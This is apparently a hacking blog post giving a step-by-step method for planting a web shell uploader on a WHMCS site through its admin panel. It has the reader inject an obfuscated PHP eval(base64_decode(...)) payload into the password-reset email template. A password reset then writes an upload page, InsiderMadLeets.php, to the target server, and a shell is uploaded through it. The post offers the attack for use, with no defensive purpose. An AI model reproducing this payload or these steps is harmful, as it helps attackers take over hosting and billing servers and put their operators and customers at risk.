Menu
 
» »Unlabelled » WHMCS Shell Uploader via Admin Panel

A+ A-
WHMCS Shell Uploader via Admin Panel
This is an alternative way to upload a shell on WHMCS Admin Panel.

What do you need?
- Any account with Admin privileges

In this method we are going to insert an UPLOAD page on our target website using a PHP code.
So, lets start!

After getting access to the admin panel go to Setup and click on General Settings:
[Image: 2q0r0yd.png]



Then search on the left panel for Email Templates:
[Image: 23ljimq.png]



Chose Password Reset Validation:
[Image: jhcu55.png]



Now you are facing an email template, this template is requested when someone want to reset his/her account password. And guess what: it is vulnerable! We can insert a malicous code on {$client_name}, so when you or someone request a new password to the server, instead of looking for the $client_name it is going to inject a code on it.
So just replace {$client_name} for this code:

Code:
{php}eval(base64_decode('JHggPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWI ​ zSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWR ​ DOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0R ​ RcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5 ​ UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0l ​ pQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blh ​ TQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYko ​ zUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodkl ​ DYzhZajVHYVd4bElGVndiRzloWkdWa0lDMGdaMjhnWm05eUlHbDBJRTFNSURzcElDRWhJVHd2WWo0OFl ​ uSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lDRWhJVHd2WWo0OFl ​ uSStQR0p5UGljN0lIME5DbjBOQ2o4KyIpOw0KJEluc2lkZXJNYWRMZWV0cyA9IGZvcGVuKCJJbnNpZGV ​ yTWFkTGVldHMucGhwIiwidyIpOw0KZndyaXRlKCRJbnNpZGVyTWFkTGVldHMsJHgpOw'));{/php}



and it should looks like this:
[Image: 13yr07.png]



Now all you need to this is find any client email address and request a new password or create a new account and do the same.

After that the code will create an upload page on the following path:
Code:
www.target.com/InsiderMadLeets.php

Now, just upload your shell and it will be placed on the same path as the upload page!

Enjoy!
Posted by Unknown

Share to:

at 16:48

Post a Comment

Subscribe to: Post Comments (Atom)
 
Top
Google+